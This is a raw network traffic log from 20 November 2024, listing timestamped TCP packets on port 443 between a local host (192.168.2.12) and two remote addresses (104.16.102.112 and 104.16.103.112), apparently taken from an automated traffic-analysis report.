                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.496757030 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.496773958 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.527934074 CET49770443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.531326056 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.540179014 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.540433884 CET44349776104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.540448904 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.540465117 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.540611982 CET49776443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.540637016 CET44349776104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.540852070 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.541028976 CET44349776104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.541320086 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.541399956 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.541590929 CET49776443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.541666031 CET44349776104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.541748047 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.541800976 CET49776443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.543170929 CET49772443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.543196917 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.543231964 CET49775443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.583332062 CET44349776104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.583337069 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.591321945 CET49772443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.633063078 CET44349767104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.633145094 CET44349767104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.633254051 CET44349767104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.633260012 CET49767443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.633300066 CET49767443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.634355068 CET49767443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.634370089 CET44349767104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.637994051 CET49779443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.638027906 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.638092041 CET49779443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.638478994 CET49779443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.638494015 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.640428066 CET49780443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.640479088 CET44349780104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.640532970 CET49780443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.640738964 CET49780443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.640748978 CET44349780104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.656850100 CET44349768104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.656913042 CET44349768104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.656980991 CET44349768104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.657001019 CET49768443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.657008886 CET44349768104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.657043934 CET49768443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.657047987 CET44349768104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.663050890 CET44349768104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.663089037 CET44349768104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.663116932 CET49768443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.663121939 CET44349768104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.663149118 CET44349768104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.663161039 CET49768443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.663187027 CET49768443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.663460970 CET49768443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.663475037 CET44349768104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.665966988 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.666003942 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.666074038 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.666400909 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.666409969 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.669116974 CET49782443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.669152021 CET44349782104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.669280052 CET49782443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.669423103 CET49782443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.669435024 CET44349782104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.908694983 CET44349770104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.908807993 CET44349770104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.908847094 CET44349770104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.908874989 CET49770443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.908881903 CET44349770104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.908916950 CET44349770104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.908942938 CET49770443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.908968925 CET44349770104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.909007072 CET49770443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.909018993 CET44349770104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.909058094 CET44349770104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.909112930 CET49770443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.910327911 CET49770443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.910356998 CET44349770104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.913810968 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.913847923 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.914231062 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.914537907 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.914550066 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.915800095 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.915885925 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.915914059 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.915941000 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.915967941 CET49771443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.915970087 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.915996075 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.916008949 CET49771443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.916038990 CET49771443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.916456938 CET44349775104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.916529894 CET44349775104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.916563034 CET44349775104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.916600943 CET49775443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.916615963 CET44349775104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.916651964 CET44349775104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.916657925 CET49775443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.916662931 CET44349775104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.916697979 CET49775443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.916703939 CET44349775104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.916743040 CET44349775104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.916780949 CET49775443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.917053938 CET49784443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.917076111 CET44349784104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.917140007 CET49784443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.917551994 CET49784443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.917562962 CET44349784104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.919260025 CET49775443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.919270039 CET44349775104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.922269106 CET49785443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.922297001 CET44349785104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.922374010 CET49785443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.922547102 CET49785443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.922557116 CET44349785104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.923970938 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.930677891 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.930732012 CET49771443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.930753946 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.939116001 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.939162970 CET49771443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.939177036 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.939189911 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.939244032 CET49771443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.939471006 CET49771443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.939482927 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.939812899 CET49786443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.939842939 CET44349786104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.940190077 CET49786443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.940696955 CET49786443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.940707922 CET44349786104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.943240881 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.943593025 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.943603992 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.944772005 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.944839001 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.945207119 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.945278883 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.945425034 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.945432901 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.960649967 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.960743904 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.960778952 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.960812092 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.960834026 CET49772443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.960855961 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.960880041 CET49772443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.968969107 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.969053030 CET49772443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.969063997 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.977535963 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.977574110 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.977617979 CET49772443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.977627993 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.977639914 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.977746010 CET49772443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.978018045 CET49772443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.978035927 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.981663942 CET44349777104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.981909990 CET49777443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.981935024 CET44349777104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.982997894 CET44349777104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.983051062 CET49777443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.983424902 CET49777443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.983511925 CET44349777104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.983541012 CET49777443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.995019913 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.023164988 CET49777443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.023188114 CET44349777104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.025831938 CET44349776104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.025904894 CET44349776104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.025932074 CET44349776104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.025954962 CET44349776104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.025980949 CET44349776104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.026010990 CET49776443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.026010990 CET49776443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.026040077 CET44349776104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.026061058 CET44349776104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.026104927 CET49776443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.026117086 CET49776443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.028016090 CET49776443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.028033018 CET44349776104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.029474974 CET49787443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.029525042 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.029659033 CET49787443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.030284882 CET49787443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.030312061 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.032567978 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.032653093 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.032690048 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.032715082 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.032725096 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.032736063 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.032794952 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.033673048 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.033782959 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.033833981 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.033888102 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.033915997 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.033929110 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.033936977 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.040908098 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.041002989 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.042002916 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.042249918 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.042306900 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.042315006 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.050681114 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.050808907 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.050817966 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.050834894 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.050882101 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.050892115 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.061455965 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.061532021 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.061537981 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.074852943 CET49777443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.105803013 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.105823994 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.105851889 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.105868101 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.151479959 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.151628017 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.152302980 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.153830051 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.158030987 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.158078909 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.158090115 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.199151039 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.199174881 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.233735085 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.237694979 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.237766027 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.237787008 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.244661093 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.245743990 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.245939970 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.245948076 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.248723030 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.248776913 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.248795986 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.253750086 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.253928900 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.253937006 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.256920099 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.256980896 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.256997108 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.265582085 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.265638113 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.265650988 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.269891977 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.269956112 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.269967079 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.278055906 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.278100967 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.278125048 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.278136015 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.278188944 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.282145023 CET44349774104.16.102.112192.168.2.12
